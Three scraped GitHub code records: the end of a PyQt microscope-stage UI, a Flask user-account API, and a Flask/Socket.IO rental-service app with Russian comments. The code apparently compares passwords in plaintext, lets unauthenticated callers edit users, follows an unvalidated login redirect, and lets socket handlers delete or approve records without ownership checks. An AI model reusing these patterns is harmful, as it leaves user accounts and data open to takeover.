self.horizontalLayout_p4.addWidget(self.rangelabel)\r\n self.verticalLayout_piezo.addLayout(self.horizontalLayout_p4)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n horizontalLayout_r=QtWidgets.QHBoxLayout(self.piezoGroupBox)\r\n label=QtWidgets.QLabel(\"recording\",self.piezoGroupBox)\r\n self.record_move_range=QtWidgets.QDoubleSpinBox(self.piezoGroupBox)\r\n self.move_stage_in_record=QtWidgets.QPushButton(\"Set\",self.piezoGroupBox)\r\n self.move_stage_in_record.setCheckable(True)\r\n horizontalLayout_r.addWidget(label)\r\n horizontalLayout_r.addWidget(self.record_move_range)\r\n horizontalLayout_r.addWidget(self.move_stage_in_record)\r\n self.verticalLayout_piezo.addLayout(horizontalLayout_r)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n self.gridLayout.addWidget(self.piezoGroupBox, 2, 2, 1,1)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n example = stageUI()\r\n sys.exit(app.exec_())\r\n","repo_name":"teldawyj/TSTORM_communication_enabled","sub_path":"stage_UI.py","file_name":"stage_UI.py","file_ext":"py","file_size_in_byte":17884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14952382022","text":"from flask_restful import Resource, reqparse\nfrom models.user import UserModel\nfrom flask_jwt_extended import create_access_token, jwt_required, get_jwt\nfrom werkzeug.security import safe_str_cmp\nfrom blacklist import BLACKLIST\nimport traceback\nfrom flask import make_response, render_template\n\nbody_request = reqparse.RequestParser()\nbody_request.add_argument('email', type=str, required=True, help=\"The field 'email' cannot be left blank.\")\nbody_request.add_argument('password', type=str, required=True, help=\"The field 'password' cannot be left blank.\")\nbody_request.add_argument('username', type=str)\nbody_request.add_argument('activated', type=bool) \nbody_request.add_argument('restaurant_id', type=str)\n\n\nclass User(Resource):\n # /users/{user_id}\n def get(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n return user.json()\n return {'message': 'User not found.'}, 404\n\n def put(self,email):\n data = body_request.parse_args()\n user = UserModel.find_by_email(email)\n if user:\n user.restaurant_id = data.get('restaurant_id')\n user.save_user()\n return user.json(), 200\n return {'message': 'User not found.'}, 404\n\n @jwt_required()\n def delete(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n user.delete_user()\n return {'message': 'User deleted.'}\n return {'message': 'User not found.'}, 404\n\nclass UserRegister(Resource):\n # /register\n def post(self):\n data = body_request.parse_args()\n if not data.get('email') or data.get('email') is None:\n return {\"message\": \"The field 'email' cannot be left blank.\"}, 400\n\n if UserModel.find_by_email(data['email']):\n return {\"message\": \"The email '{}' already exists.\".format(data['email'])}, 400\n\n if UserModel.find_by_username(data['username']):\n return {\"message\": \"The username '{}' already exists.\".format(data['username'])}, 400 #Bad Request\n\n user = UserModel(**data)\n user.activated = True ###################### Change Here - False after\n try:\n user.save_user()\n user.send_confirmation_email()\n except:\n user.delete_user()\n traceback.print_exc()\n return {'message': 'An internal server error has ocurred.'}, 500\n return {'message': 'User created successfully!'}, 201 # Created\n\nclass UserLogin(Resource):\n\n @classmethod\n def post(cls):\n data = body_request.parse_args()\n\n user = UserModel.find_by_email(data['email'])\n\n if user and safe_str_cmp(user.password, data['password']):\n if user.activated:\n access_token = create_access_token(identity=user.user_id)\n return {'username': user.username, \n \"restaurant_id\": user.restaurant_id, \n \"email\": user.email,\n 'access_token': access_token}, 200\n return {'message': 'User not confirmed.'}, 400\n return {'message': 'The email or password is incorrect.'}, 401 # Unauthorized\n\n\nclass UserLogout(Resource):\n\n @jwt_required()\n def post(self):\n jwt_id = get_jwt()['jti'] # JWT Token Identifier\n BLACKLIST.add(jwt_id)\n return {'message': 'Logged out successfully!'}, 200\n\nclass UserConfirm(Resource):\n # /confirm/{user_id}\n @classmethod\n def get(cls, user_id):\n user = UserModel.find_user(user_id)\n\n if not user:\n return {\"message\": \"User id '{}' not found.\".format(user_id)}, 404\n\n user.activated = True\n user.save_user()\n # return {\"message\": \"User id '{}' confirmed successfully.\".format(user_id)}, 200\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('user_confirm.html', email=user.email, user=user.username), 200, headers)\n","repo_name":"odanilomoreira/sms-creator","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72161870826","text":"# Импортирование необходимых модулей\nimport os\nfrom uuid import uuid4\nfrom dotenv import load_dotenv, find_dotenv\nfrom flask import Flask, render_template, request, redirect, flash, json\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import or_\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user\nfrom flask_socketio import SocketIO\nfrom datetime import date\n\nload_dotenv(find_dotenv())\n\n# Создание экземпляра app\napp = Flask(__name__)\napp.secret_key = os.getenv('SECRET_KEY')\n\n# Создание экземпляра socketio\nsocketio = SocketIO(app)\n\n# Настройки приложения и подключения к базе данных\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DB_URI')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nUPLOAD_FOLDER = os.getenv('UPLOAD_FOLDER')\n\n# Создание экземпляра login_manager\nlogin_manager = LoginManager(app)\n\n\n# Создание моделей базы данных\n# Пользователь\nclass User(db.Model, UserMixin):\n __tablename__ = 'user'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(20), nullable=True)\n dob = db.Column(db.Date, nullable=True)\n role = db.Column(db.String(13), nullable=True)\n phone = db.Column(db.String(12), nullable=True)\n email = db.Column(db.String(50), nullable=True, unique=True)\n hash_password = db.Column(db.String(500), nullable=True)\n\n\n# Определение функции user_loader экземпляра login_manager\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(user_id)\n\n\n# Предмет\nclass Item(db.Model):\n __tablename__ = 'item'\n id_item = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=True)\n category = db.Column(db.String(100), nullable=True)\n description = db.Column(db.Text, nullable=True)\n rent_price = db.Column(db.Numeric, nullable=True)\n image_url = db.Column(db.String(100), nullable=True)\n\n\n# Объявление аренды\nclass RentOut(db.Model):\n __tablename__ = 'rent_out'\n id_rent_out = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.String(9), nullable=True)\n id_user = db.Column(db.Integer, db.ForeignKey(\"user.id\"))\n id_item = db.Column(db.Integer, db.ForeignKey(\"item.id_item\"))\n\n\n# Заявка на аренду\nclass RentIn(db.Model):\n __tablename__ = 'rent_in'\n id_rent_in = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.String(20), nullable=True)\n date_rent_start = db.Column(db.DateTime, nullable=True)\n date_rent_finish = db.Column(db.DateTime, nullable=True)\n note = db.Column(db.Text)\n id_user = db.Column(db.Integer, db.ForeignKey(\"user.id\"))\n id_rent_out = db.Column(db.Integer, db.ForeignKey(\"rent_out.id_rent_out\"))\n\n\n# Корзина\nclass Bag(db.Model):\n __tablename__ = 'bag'\n id_bag = db.Column(db.Integer, primary_key=True)\n id_user = db.Column(db.Integer, db.ForeignKey(\"user.id\"))\n id_rent_out = db.Column(db.Integer, db.ForeignKey(\"rent_out.id_rent_out\"))\n\n\n# Жалоба\nclass Complaint(db.Model):\n __tablename__ = 'complaint'\n id_complaint = db.Column(db.Integer, primary_key=True)\n id_rent_in = db.Column(db.Integer, db.ForeignKey(\"rent_in.id_rent_in\"))\n id_user = db.Column(db.Integer, db.ForeignKey(\"user.id\"))\n description = db.Column(db.Text, nullable=True)\n status = db.Column(db.String(20), nullable=True)\n\n\n# Обработчики адресов\n# Главная страница\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n\n# Страница регистрации\n@app.route(\"/registration\", methods=(\"POST\", \"GET\"))\ndef registration():\n if request.method == \"POST\":\n # Получение данных из формы\n username = request.form[\"username\"]\n dob = request.form[\"dob\"]\n phone = request.form[\"phone\"]\n email = request.form[\"email\"]\n password = request.form[\"password\"]\n confirm = request.form[\"confirm\"]\n # Валидация полученных данных\n if len(username) > 20 or len(username) < 1 or username.isalpha() is False:\n flash(\"Имя должно состоять из алфавитных символов и быть длинной от 1 до 20 символов.\")\n elif len(dob) != 10 or (\n (date.today().year - int(dob[:4])) * 12 * 30 + date.today().month * 30 + date.today().day - (\n int(dob[5:7]) * 30 + int(dob[8:10]))) / 360 < 18:\n flash(\n \"Регистрация доступна только с 18 лет. Если Вы достигли указанного возраста проверьте формат даты.\")\n elif len(phone) != 12 or (phone[0] + phone[1] != \"+7\") or phone[1:].isdigit() is False:\n flash(\"Неверный формат номера.\")\n elif email.count(\"@\") != 1 or email.count(\".\") < 1 or len(email) < 6 or len(email) > 50:\n flash(\"Неверный формат электронной почты.\")\n elif len(password) > 20 or len(password) < 3:\n flash(\"Длина пароля должна составлять от 3 до 20 символов.\")\n elif password != confirm:\n flash(\"Пароли не совпадают.\")\n else:\n try:\n # Создание экземпляра класса User и добавление его в бд\n hash = generate_password_hash(password)\n user = User(\n username=username,\n dob=dob,\n role=\"клиент\",\n phone=phone,\n email=email,\n hash_password=hash)\n db.session.add(user)\n db.session.commit()\n flash(\"Учётная запись успешно создана.\", category=\"success\")\n return redirect(\"/profile\")\n except:\n db.session.rollback()\n flash(\n \"Проверьте корректность введённых данных. Возможно, пользователь с таким Email уже зарегистрирован.\")\n\n return render_template(\"registration.html\")\n\n\n# Определение профиля\n@app.route(\"/profile\")\n@login_required\ndef profile():\n # Проверка роли пользователя\n user_login = User.query.get(current_user.id)\n if user_login.role == \"клиент\":\n return redirect(\"/profile_client\")\n else:\n return redirect(\"/profile_admin\")\n\n\n# Страница профиля клиента\n@app.route(\"/profile_client\")\n@login_required\ndef profile_client():\n # Проверка роли пользователя\n user = User.query.get(current_user.id)\n if user.role != \"клиент\":\n return redirect(\"/profile\")\n return render_template(\"profile_client.html\", user=user)\n\n\n# Страница профиля администратора\n@app.route(\"/profile_admin\")\n@login_required\ndef profile_admin():\n # Определение роли пользователя\n admin = User.query.get(current_user.id)\n if admin.role != \"администратор\":\n return redirect(\"/profile\")\n return render_template(\"profile_admin.html\", admin=admin)\n\n\n# Страница входа в систему\n@app.route(\"/login\", methods=(\"POST\", \"GET\"))\ndef login():\n if request.method == \"POST\":\n # Получение данных из формы\n email = request.form[\"email\"]\n password = request.form[\"password\"]\n # Валидация полученных данных\n if email.count(\"@\") != 1 or email.count(\".\") < 1 or len(email) < 6 or len(email) > 50:\n flash(\"Неверный формат электронной почты.\")\n elif len(password) > 20 or len(password) < 3:\n flash(\"Длина пароля должна составлять от 3 до 20 символов.\")\n else:\n # Получение из бд пользователя по полю email\n user = User.query.filter_by(email=email).first()\n # Если данные верны, то пользователь будет авторизован и перенаправлен на запрашиваемую страницу\n if user and check_password_hash(user.hash_password, password):\n login_user(user)\n next_page = request.args.get(\"next\")\n return redirect(next_page)\n else:\n flash(\"Неверный логин или пароль.\")\n\n return render_template(\"login.html\")\n\n\n# Обработчик выхода\n@app.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n return redirect(\"/\")\n\n\n# Каталог\n@app.route(\"/catalog\")\ndef catalog():\n return render_template(\"catalog.html\")\n\n\n# Страница модерации объявлений\n@app.route(\"/moderation\")\n@login_required\ndef moderation():\n return render_template(\"moderation.html\")\n\n\n# Страница просмотра жалоб пользователей\n@app.route(\"/complaint\")\n@login_required\ndef complaint():\n return render_template(\"complaint.html\")\n\n\n# Страница объявлений пользователя\n@app.route(\"/my_rent_out\")\n@login_required\ndef my_rent_out():\n return render_template(\"my_rent_out.html\")\n\n\n# Страница избранных предметов\n@app.route(\"/bag\")\n@login_required\ndef bag():\n return render_template(\"bag.html\")\n\n\n# Страница создания нового объявления\n@app.route(\"/add_rent_out\", methods=(\"POST\", \"GET\"))\n@login_required\ndef add_rent_out():\n if request.method == 'POST':\n try:\n name = request.form['name']\n category = request.form['category']\n description = request.form['description']\n rent_price = request.form['rent_price']\n file = request.files['file']\n file.filename = str(uuid4()) + '.png'\n save_path = os.path.join(UPLOAD_FOLDER, file.filename)\n file.save(save_path)\n\n # Создание предмета с полученными данными и запись в бд\n item = Item(name=name, category=category, description=description, rent_price=rent_price,\n image_url=save_path)\n db.session.add(item)\n db.session.commit()\n\n # Получение id только что добавленного предмета\n new_item = db.session.query(Item).order_by(Item.id_item.desc()).first()\n # Создание объявления и добавление в бд\n rent_out = RentOut(status=\"активно\", id_item=new_item.id_item, id_user=current_user.id)\n db.session.add(rent_out)\n db.session.commit()\n flash(\"Объявление успешно добавлено.\", category=\"success\")\n except:\n db.session.rollback()\n flash(\"Возникла ошибка. Не удалось добавить объявление. Попробуйте ещё раз.\")\n\n return render_template(\"add_rent_out.html\")\n\n\n# Страница создания новой заявки\n@app.route(\"/add_rent_in/\")\n@login_required\ndef add_rent_in(id_rent_out):\n return render_template(\"add_rent_in.html\", id_rent_out=id_rent_out)\n\n\n# Страница создания новой жалобы\n@app.route(\"/add_complaint/\")\n@login_required\ndef add_complaint(id_rent_in):\n return render_template(\"add_complaint.html\", id_rent_in=id_rent_in)\n\n\n# Страница входящих заявок\n@app.route(\"/incoming\")\n@login_required\ndef incoming():\n return render_template(\"incoming.html\")\n\n\n# Страница исходящих заявок\n@app.route(\"/outgoing\")\n@login_required\ndef outgoing():\n return render_template(\"outgoing.html\")\n\n\n# Страница с действующими арендами пользователя\n@app.route(\"/irent\")\n@login_required\ndef irent():\n return render_template(\"irent.html\")\n\n\n# Страница с действующими сдачами в аренду пользователя\n@app.route(\"/notirent\")\n@login_required\ndef notirent():\n return render_template(\"notirent.html\")\n\n\n# История моих аренд\n@app.route(\"/irent_histori\")\n@login_required\ndef irent_histori():\n return render_template(\"irent_histori.html\")\n\n\n# История сдачи в аренду\n@app.route(\"/notirent_histori\")\n@login_required\ndef notirent_histori():\n return render_template(\"notirent_histori.html\")\n\n\n# Страница жалоб пользователя\n@app.route(\"/my_complaint\")\n@login_required\ndef my_complaint():\n return render_template(\"my_complaint.html\")\n\n\n# Перенаправление для гостя\n@app.after_request\ndef redirect_to_signin(response):\n if response.status_code == 401:\n return redirect(\"/login\" + \"?next=\" + request.url)\n return response\n\n\n# Обработчики событий socket.io\n# Обновление данных каталога\n@socketio.on('reload_catalog')\ndef handle_reload_catalog():\n # Получение данных об объявлении\n catalog = db.session.query(RentOut, Item).join(Item, RentOut.id_item == Item.id_item) \\\n .filter(RentOut.status == \"активно\") \\\n .order_by(RentOut.id_rent_out.desc()).all()\n catalog_list = [{'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url\n } for a in catalog]\n # Упаковка данных в json\n catalog_json = json.dumps(catalog_list)\n # Отправка события 'catalog' с данными на клиент\n socketio.emit('catalog', catalog_json)\n\n\n# Добавление жалобы\n@socketio.on('add_complaint')\ndef add_complaint(data):\n # Распаковка json\n data_json = json.loads(data)\n id_rent_in = data_json['id_rent_in']\n description = data_json['description']\n status = \"рассматривается\"\n id_user = current_user.id\n\n # Создание экземпляра класса и запись в БД\n complaint = Complaint(id_rent_in=id_rent_in, description=description, status=status, id_user=id_user)\n db.session.add(complaint)\n db.session.commit()\n\n # Отправка события 'connect' с сервера на клиент\n socketio.emit('connect')\n\n\n# Обновление страницы с жалобами\n@socketio.on('reload_complaint')\ndef handle_reload_complaint():\n # Получение данных о всех жалобах из БД\n complaint = db.session.query(Complaint, RentIn, RentOut, Item, User) \\\n .join(RentIn, Complaint.id_rent_in == RentIn.id_rent_in) \\\n .join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, Complaint.id_user == User.id) \\\n .order_by(RentIn.id_rent_in.desc()).all()\n complaint_list = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'id_complaint': a.Complaint.id_complaint,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status,\n 'status_complaint': a.Complaint.status,\n 'description_complaint': a.Complaint.description\n } for a in complaint]\n # Упаковка в json и отправка на нужный адрес\n complaint_json = json.dumps(complaint_list, default=str)\n socketio.emit('complaint', complaint_json)\n\n\n# Обновление страницы с жалобами пользователя\n@socketio.on('reload_my_complaint')\ndef handle_reload_my_complaint():\n # Получение всех жалоб текущего пользователя из БД\n complaint = db.session.query(Complaint, RentIn, RentOut, Item, User) \\\n .join(RentIn, Complaint.id_rent_in == RentIn.id_rent_in) \\\n .join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, Complaint.id_user == User.id) \\\n .filter(Complaint.id_user == current_user.id)\\\n .order_by(RentIn.id_rent_in.desc()).all()\n complaint_list = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'id_complaint': a.Complaint.id_complaint,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status,\n 'status_complaint': a.Complaint.status,\n 'description_complaint': a.Complaint.description\n } for a in complaint]\n # Упаковка и отправка по адресу\n complaint_json = json.dumps(complaint_list, default=str)\n socketio.emit('my_complaint', complaint_json)\n\n\n# Обновление статуса жалобы\n@socketio.on('resolved')\ndef handle_resolved(id_complaint):\n complaint = Complaint.query.get(id_complaint)\n if complaint.status == \"рассматривается\":\n complaint.status = \"жалоба закрыта\"\n db.session.commit()\n socketio.emit('connect')\n\n\n# Удаление объявление\n@socketio.on('del_rent_out')\ndef handle_del_rent_out(id_rent_out):\n rent_out = RentOut.query.get(id_rent_out)\n bags = Bag.query.filter(Bag.id_rent_out == id_rent_out).all()\n for b in bags:\n db.session.delete(b)\n db.session.commit()\n rent_out.status = \"удалено\"\n db.session.commit()\n socketio.emit('connect')\n\n\n# Обновление страницы с объявлениями текущего пользователя\n@socketio.on('reload_my_rent_out')\ndef handle_reload_my_rent_out():\n # Получение всех действующих объявлений текущего пользователя из БД\n catalog = db.session.query(RentOut, Item).join(Item, RentOut.id_item == Item.id_item) \\\n .filter(RentOut.id_user == current_user.id, RentOut.status != \"удалено\") \\\n .order_by(RentOut.id_rent_out.desc()).all()\n catalog_list = [{'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url\n } for a in catalog]\n # Упаковка и отправка по указанному адресу\n catalog_json = json.dumps(catalog_list)\n socketio.emit('my_rent_out', catalog_json)\n\n\n# Функция добавления объявления в избранные объявления\n@socketio.on('add_bag')\ndef handle_add_bag(id_rent_out):\n id_user = current_user.id\n id_rent_out = id_rent_out\n bag = Bag(id_user=id_user, id_rent_out=id_rent_out)\n db.session.add(bag)\n db.session.commit()\n socketio.emit('connect')\n\n\n# Функция удаления объявления из избранных объявлений\n@socketio.on('del_bag')\ndef handle_del_bag(id_bag):\n bag = Bag.query.get(id_bag)\n db.session.delete(bag)\n db.session.commit()\n socketio.emit('connect')\n\n\n# Обновление страницы с избранными объявлениями\n@socketio.on('reload_bag')\ndef handle_reload_bag():\n # Получение из БД всех активных объявлений из избранных\n bag = db.session.query(Bag, RentOut, Item).join(RentOut, Bag.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .filter(Bag.id_user == current_user.id, RentOut.status == \"активно\") \\\n .order_by(Bag.id_bag.desc()).all()\n bags = [{'id_bag': a.Bag.id_bag,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url\n } for a in bag]\n # Упаковка и отправка на указанный адрес\n bags_json = json.dumps(bags)\n socketio.emit('bag', bags_json)\n\n\n# Создание заявки на аренду\n@socketio.on('add_rent_in')\ndef handle_add_rent_in(data):\n # Распаковка данных с клиента\n data_json = json.loads(data)\n status = 'подана'\n date_rent_start = data_json['date_rent_start']\n date_rent_finish = data_json['date_rent_finish']\n note = data_json['note']\n id_rent_out = data_json['id_rent_out']\n id_user = current_user.id\n # Создание экземпляра класса и запись в БД\n rent_in = RentIn(status=status, date_rent_start=date_rent_start, date_rent_finish=date_rent_finish, note=note,\n id_rent_out=id_rent_out, id_user=id_user)\n db.session.add(rent_in)\n db.session.commit()\n\n socketio.emit('connect')\n\n\n# Функция удаления заявки\n@socketio.on('del_rent_in')\ndef handle_del_rent_in(id_rent_in):\n rent_in = RentIn.query.get(id_rent_in)\n db.session.delete(rent_in)\n db.session.commit()\n socketio.emit('connect')\n\n\n# Функция одобрения заявки\n@socketio.on('approve')\ndef handle_approve(id_rent_in, id_rent_out):\n rent_in = RentIn.query.get(id_rent_in)\n rent_out = RentOut.query.get(id_rent_out)\n rent_out.status = \"неактивно\"\n rent_in.status = \"одобрена\"\n db.session.commit()\n socketio.emit('connect')\n\n\n# Функция изменения статуса аренды при начале аренды\n@socketio.on('rent_start')\ndef handle_rent_start(id_rent_in):\n rent_in = RentIn.query.get(id_rent_in)\n if rent_in.status == \"одобрена\":\n rent_in.status = \"в аренде\"\n db.session.commit()\n socketio.emit('connect')\n\n\n# Функция изменения статуса аренды при конце аренды\n@socketio.on('rent_finish')\ndef handle_rent_finish(id_rent_in, id_rent_out):\n rent_in = RentIn.query.get(id_rent_in)\n if rent_in.status == \"в аренде\":\n rent_out = RentOut.query.get(id_rent_out)\n rent_out.status = \"активно\"\n rent_in.status = \"аренда завершена\"\n db.session.commit()\n socketio.emit('connect')\n\n\n# Обновление данных на странице исходящих заявок текущего пользователя\n@socketio.on('reload_outgoing')\ndef handle_reload_outgoing():\n # Получение всех действующих исходящих заявок пользователя из БД\n outgoing = db.session.query(RentIn, RentOut, Item).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .filter(RentIn.id_user == current_user.id, RentIn.status == \"подана\") \\\n .order_by(RentIn.id_rent_in.desc()).all()\n outgoings = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in outgoing]\n # Упаковка и отправка на указанный адрес\n outgoings_json = json.dumps(outgoings)\n socketio.emit('outgoing', outgoings_json)\n\n\n# Обновление данных на странице входящих заявок текущего пользователя\n@socketio.on('reload_incoming')\ndef handle_reload_incoming():\n # Получение всех действующих входящих заявок пользователя из БД\n incoming = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentIn.id_user == User.id) \\\n .filter(RentOut.id_user == current_user.id, RentIn.status == \"подана\") \\\n .order_by(RentIn.id_rent_in.desc()).all()\n incomings = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in incoming]\n # Упаковка и отправка на указанный адрес\n incomings_json = json.dumps(incomings)\n socketio.emit('incoming', incomings_json)\n\n\n# Обновление данных страницы сданных предметов текущего пользователя\n@socketio.on('reload_notirent')\ndef handle_reload_notirent():\n # Получение из БД записей текущих сдач в аренду пользователя\n notirent = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentIn.id_user == User.id) \\\n .filter(RentOut.id_user == current_user.id, or_(RentIn.status == \"одобрена\", RentIn.status == \"в аренде\")) \\\n .order_by(RentIn.id_rent_in.desc()).all()\n notirents = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in notirent]\n # Упаковка и отправка на указанный адрес\n notirents_json = json.dumps(notirents)\n socketio.emit('notirent', notirents_json)\n\n\n# Обновление данных страницы взятых в аренду предметов текущим пользователем\n@socketio.on('reload_irent')\ndef handle_reload_irent():\n irent = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentOut.id_user == User.id) \\\n .filter(RentIn.id_user == current_user.id, or_(RentIn.status == \"одобрена\", RentIn.status == \"в аренде\")) \\\n .order_by(RentIn.id_rent_in.desc()).all()\n irents = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in irent]\n # Упаковка и отправка на указанный адрес\n irents_json = json.dumps(irents)\n socketio.emit('irent', irents_json)\n\n\n# Обновление страницы истории взятия в аренду предметов текущим пользователем\n@socketio.on('reload_irent_history')\ndef handle_reload_irent_history():\n irent = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentOut.id_user == User.id) \\\n .filter(RentIn.id_user == current_user.id, RentIn.status == \"аренда завершена\") \\\n .order_by(RentIn.id_rent_in.desc()).all()\n irents = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in irent]\n # Упаковка и отправка на указанный адрес\n irents_json = json.dumps(irents)\n socketio.emit('irent_history', irents_json)\n\n\n# Обновление страницы истории сдачи в аренду предметов текущим пользователем\n@socketio.on('reload_notirent_history')\ndef handle_reload_notirent_history():\n notirent = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentIn.id_user == User.id) \\\n .filter(RentOut.id_user == current_user.id, RentIn.status == \"аренда завершена\") \\\n .order_by(RentIn.id_rent_in.desc()).all()\n notirents = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in notirent]\n # Упаковка и отправка на указанный адрес\n notirents_json = json.dumps(notirents)\n socketio.emit('notirent_history', notirents_json)\n\n\n# Обработчик запуска сервера\nif __name__ == '__main__':\n socketio.run(app, allow_unsafe_werkzeug=True)\n","repo_name":"PavelUrakov4942/RentalService","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":33840,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 